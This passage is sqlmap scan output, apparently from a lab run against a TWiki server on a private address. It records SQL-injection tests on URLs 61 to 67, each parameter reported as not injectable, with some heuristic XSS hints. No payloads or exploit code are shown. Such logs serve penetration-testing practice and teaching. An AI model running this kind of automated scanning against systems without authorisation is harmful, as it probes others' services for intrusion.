[18:50:56] [INFO] heuristics detected web page charset 'ascii' | |
[18:50:56] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:50:56] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:50:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:50:57] [WARNING] reflective value(s) found and filtering out | |
[18:50:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:50:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:50:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:50:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:51:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:51:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:51:00] [INFO] testing 'MySQL inline queries' | |
[18:51:01] [INFO] testing 'PostgreSQL inline queries' | |
[18:51:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:51:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:51:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:51:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:51:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:51:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:51:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:51:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:51:04] [INFO] testing 'Oracle AND time-based blind' | |
[18:51:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:51:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:51:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:51:17] [WARNING] GET parameter 'skin' is not injectable | |
[18:51:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 61: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.15&rev2=1.14 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:51:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.15&rev2=1.14' | |
[18:51:17] [INFO] testing connection to the target URL | |
[18:51:18] [INFO] testing if the target URL is stable | |
[18:51:19] [INFO] target URL is stable | |
[18:51:19] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:51:19] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:51:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:51:19] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:51:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:51:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:51:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:51:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:51:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:51:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:51:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:51:22] [INFO] testing 'MySQL inline queries' | |
[18:51:22] [INFO] testing 'PostgreSQL inline queries' | |
[18:51:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:51:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:51:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:51:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:51:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:51:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:51:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:51:25] [INFO] testing 'Oracle AND time-based blind' | |
[18:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:51:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:51:38] [WARNING] GET parameter 'rev1' is not injectable | |
[18:51:38] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:51:38] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:51:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:51:38] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:51:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:51:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:51:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:51:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:51:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:51:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:51:42] [INFO] testing 'MySQL inline queries' | |
[18:51:43] [INFO] testing 'PostgreSQL inline queries' | |
[18:51:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:51:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:51:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:51:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:51:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:51:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:51:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:51:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:51:47] [INFO] testing 'Oracle AND time-based blind' | |
[18:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:51:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:51:59] [WARNING] GET parameter 'rev2' is not injectable | |
[18:51:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 62: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.14 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:51:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.14' | |
[18:51:59] [INFO] testing connection to the target URL | |
[18:51:59] [INFO] testing if the target URL is stable | |
[18:52:00] [INFO] target URL is stable | |
[18:52:00] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:52:00] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:52:00] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:52:00] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:52:00] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:52:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:52:00] [WARNING] reflective value(s) found and filtering out | |
[18:52:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:52:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:52:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:52:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:52:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:52:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:52:04] [INFO] testing 'MySQL inline queries' | |
[18:52:04] [INFO] testing 'PostgreSQL inline queries' | |
[18:52:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:52:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:52:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:52:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:52:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:52:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:52:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:52:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:52:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:52:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:52:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:52:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:52:21] [WARNING] GET parameter 'rev' is not injectable | |
[18:52:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:52:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.14&rev2=1.13' | |
[18:52:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.13' | |
URL 63: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingFAQ?template=oopsmore¶m1=1.15¶m2=1.15 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:52:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingFAQ?template=oopsmore¶m1=1.15¶m2=1.15' | |
[18:52:21] [INFO] testing connection to the target URL | |
[18:52:22] [INFO] testing if the target URL is stable | |
[18:52:22] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:52:22] [INFO] testing if GET parameter 'template' is dynamic | |
[18:52:23] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:52:23] [INFO] GET parameter 'template' is dynamic | |
[18:52:23] [INFO] heuristics detected web page charset 'ascii' | |
[18:52:23] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:52:23] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:52:23] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:52:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:52:23] [WARNING] reflective value(s) found and filtering out | |
[18:52:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:52:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:52:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:52:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:52:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:52:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:52:25] [INFO] testing 'MySQL inline queries' | |
[18:52:26] [INFO] testing 'PostgreSQL inline queries' | |
[18:52:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:52:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:52:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:52:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:52:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:52:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:52:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:52:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:52:28] [INFO] testing 'Oracle AND time-based blind' | |
[18:52:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:52:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:52:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:52:37] [WARNING] GET parameter 'template' is not injectable | |
[18:52:37] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:52:37] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:52:37] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:52:38] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:52:38] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:52:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:52:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:52:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:52:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:52:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:52:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:52:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:52:42] [INFO] testing 'MySQL inline queries' | |
[18:52:42] [INFO] testing 'PostgreSQL inline queries' | |
[18:52:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:52:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:52:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:52:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:52:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:52:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:52:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:52:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:52:45] [INFO] testing 'Oracle AND time-based blind' | |
[18:52:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:52:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:53:00] [WARNING] GET parameter 'param1' is not injectable | |
[18:53:00] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:53:00] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:53:00] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:53:00] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:53:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:53:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:53:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:53:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:53:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:53:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:53:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:53:04] [INFO] testing 'MySQL inline queries' | |
[18:53:04] [INFO] testing 'PostgreSQL inline queries' | |
[18:53:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:53:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:53:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:53:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:53:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:53:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:53:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:53:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:53:08] [INFO] testing 'Oracle AND time-based blind' | |
[18:53:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:53:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:53:22] [WARNING] GET parameter 'param2' is not injectable | |
[18:53:22] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 64: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/MartinRaabe?topicparent=TWiki.TWikiDocumentation | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:53:22] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/MartinRaabe?topicparent=TWiki.TWikiDocumentation' | |
[18:53:22] [INFO] testing connection to the target URL | |
[18:53:23] [INFO] testing if the target URL is stable | |
[18:53:24] [INFO] target URL is stable | |
[18:53:24] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[18:53:24] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[18:53:24] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[18:53:24] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[18:53:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:53:24] [WARNING] reflective value(s) found and filtering out | |
[18:53:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:53:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:53:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:53:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:53:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:53:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:53:27] [INFO] testing 'MySQL inline queries' | |
[18:53:27] [INFO] testing 'PostgreSQL inline queries' | |
[18:53:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:53:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:53:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:53:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:53:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:53:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:53:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:53:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:53:30] [INFO] testing 'Oracle AND time-based blind' | |
[18:53:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:53:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:53:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:53:41] [WARNING] GET parameter 'topicparent' is not injectable | |
[18:53:41] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 65: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.TWikiDocumentation | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:53:41] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.TWikiDocumentation' | |
[18:53:41] [INFO] testing connection to the target URL | |
[18:53:42] [INFO] testing if the target URL is stable | |
[18:53:42] [INFO] target URL is stable | |
[18:53:42] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[18:53:43] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[18:53:43] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[18:53:43] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[18:53:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:53:43] [WARNING] reflective value(s) found and filtering out | |
[18:53:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:53:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:53:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:53:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:53:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:53:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:53:46] [INFO] testing 'MySQL inline queries' | |
[18:53:46] [INFO] testing 'PostgreSQL inline queries' | |
[18:53:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:53:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:53:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:53:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:53:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:53:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:53:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:53:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:53:49] [INFO] testing 'Oracle AND time-based blind' | |
[18:53:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:53:49] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:53:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:54:00] [WARNING] GET parameter 'topicparent' is not injectable | |
[18:54:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 66: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TWikiDocumentation | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:54:00] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TWikiDocumentation' | |
[18:54:00] [INFO] testing connection to the target URL | |
[18:54:01] [INFO] testing if the target URL is stable | |
[18:54:02] [INFO] target URL is stable | |
[18:54:02] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[18:54:02] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[18:54:02] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[18:54:02] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[18:54:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:54:02] [WARNING] reflective value(s) found and filtering out | |
[18:54:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:54:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:54:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:54:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:54:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:54:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:54:05] [INFO] testing 'MySQL inline queries' | |
[18:54:05] [INFO] testing 'PostgreSQL inline queries' | |
[18:54:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:54:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:54:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:54:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:54:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:54:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:54:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:54:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:54:08] [INFO] testing 'Oracle AND time-based blind' | |
[18:54:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:54:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:54:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:54:19] [WARNING] GET parameter 'topicparent' is not injectable | |
[18:54:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 67: | |
GET http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=&filename=Sample.txt | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:54:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/viewfile/TWiki/FileAttachment?rev=&filename=Sample.txt' | |
[18:54:19] [INFO] testing connection to the target URL | |
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/pub/TWiki/FileAttachment/Sample.txt'. Do you want to follow? [Y/n] Y | |
[18:54:19] [INFO] heuristics detected web page charset 'ascii' | |
[18:54:20] [INFO] testing if the target URL is stable | |
[18:54:20] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:54:21] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:54:21] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:54:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:54:21] [WARNING] reflective value(s) found and filtering out | |
[18:54:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:54:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:54:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:54:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:54:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:54:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:54:23] [INFO] testing 'MySQL inline queries' | |
[18:54:24] [INFO] testing 'PostgreSQL inline queries' | |
[18:54:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:54:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:54:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:54:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
